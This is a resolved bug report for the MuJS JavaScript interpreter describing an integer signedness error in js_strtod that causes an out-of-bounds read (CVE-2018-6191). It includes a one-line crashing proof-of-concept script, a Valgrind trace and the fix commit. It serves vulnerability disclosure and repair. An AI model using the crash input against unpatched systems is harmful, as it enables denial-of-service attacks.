Bug 698920

Summary: Integer signedness error leading to Out-of-bounds read that causes crash
Product: MuJS Reporter: invictus1306 <asindoni85>
Component: generalAssignee: Tor Andersson <tor.andersson>
Status: RESOLVED FIXED    
Severity: blocker CC: chris.liddell
Priority: P1    
Version: unspecified   
Hardware: PC   
OS: Linux   
Customer: Word Size: ---

Description invictus1306 2018-01-24 07:06:16 UTC
Mujs has an integer signedness error leading to Out-of-bounds read that causes crash.

Content of the poc file
$ cat poc.js
function pipo() {var  2e2147483648= 117486231123842366;}

run it
$ mujs poc.js
SIGSEGV

Valgrind report:
==2099== Memcheck, a memory error detector
==2099== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
==2099== Using Valgrind-3.13.0 and LibVEX; rerun with -h for copyright info
==2099== Command: ./build/debug/mujs b.js
==2099== 
==2099== Invalid read of size 8
==2099==    at 0x40D897: js_strtod (jsdtoa.c:725)
==2099==    by 0x411C51: lexnumber (jslex.c:366)
==2099==    by 0x41275D: jsY_lexx (jslex.c:567)
==2099==    by 0x412FA0: jsY_lex (jslex.c:725)
==2099==    by 0x4184A7: jsP_next (jsparse.c:138)
==2099==    by 0x41BD5E: statement (jsparse.c:696)
==2099==    by 0x41CBF9: scriptelement (jsparse.c:842)
==2099==    by 0x41CC2C: script (jsparse.c:850)
==2099==    by 0x41CD3E: funbody (jsparse.c:860)
==2099==    by 0x418E61: fundec (jsparse.c:286)
==2099==    by 0x41CBEB: scriptelement (jsparse.c:841)
==2099==    by 0x41CC2C: script (jsparse.c:850)
==2099==  Address 0x640000 is not stack'd, malloc'd or (recently) free'd
==2099== 
==2099== 
==2099== Process terminating with default action of signal 11 (SIGSEGV)
==2099==  Access not within mapped region at address 0x640000
==2099==    at 0x40D897: js_strtod (jsdtoa.c:725)
==2099==    by 0x411C51: lexnumber (jslex.c:366)
==2099==    by 0x41275D: jsY_lexx (jslex.c:567)
==2099==    by 0x412FA0: jsY_lex (jslex.c:725)
==2099==    by 0x4184A7: jsP_next (jsparse.c:138)
==2099==    by 0x41BD5E: statement (jsparse.c:696)
==2099==    by 0x41CBF9: scriptelement (jsparse.c:842)
==2099==    by 0x41CC2C: script (jsparse.c:850)
==2099==    by 0x41CD3E: funbody (jsparse.c:860)
==2099==    by 0x418E61: fundec (jsparse.c:286)
==2099==    by 0x41CBEB: scriptelement (jsparse.c:841)
==2099==    by 0x41CC2C: script (jsparse.c:850)
==2099==  If you believe this happened as a result of a stack
==2099==  overflow in your program's main thread (unlikely but
==2099==  possible), you can try to increase the size of the
==2099==  main thread stack using the --main-stacksize= flag.
==2099==  The main thread stack size used in this run was 8388608.
==2099== 
==2099== HEAP SUMMARY:
==2099==     in use at exit: 118,560 bytes in 1,283 blocks
==2099==   total heap usage: 1,385 allocs, 102 frees, 127,576 bytes allocated
==2099== 
==2099== LEAK SUMMARY:
==2099==    definitely lost: 0 bytes in 0 blocks
==2099==    indirectly lost: 0 bytes in 0 blocks
==2099==      possibly lost: 0 bytes in 0 blocks
==2099==    still reachable: 118,560 bytes in 1,283 blocks
==2099==         suppressed: 0 bytes in 0 blocks
==2099== Rerun with --leak-check=full to see details of leaked memory
==2099== 
==2099== For counts of detected and suppressed errors, rerun with: -v
==2099== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
Segmentation fault (core dumped)

Some details about the bug:

Inside the function js_strtod, after this line https://github.com/ccxvii/mujs/blob/81388eb40d29f10599ac30dde90e683a3c254375/jsdtoa.c#L714

exp = -exp;

the value of "exp" is still negative (cause integer declaration).

Please let me know if you need more information.
Comment 1 Tor Andersson 2018-01-24 07:57:16 UTC
commit 25821e6d74fab5fcc200fe5e818362e03e114428 (HEAD -> master, tor/master, origin/master, origin/HEAD, github/master)
Author: Tor Andersson <tor.andersson@artifex.com>
Date:   Wed Jan 24 16:55:18 2018 +0100

    Fix 698920: Guard jsdtoa from integer overflow wreaking havoc.
Comment 2 invictus1306 2018-01-25 02:49:12 UTC
This issue has been assigned CVE-2018-6191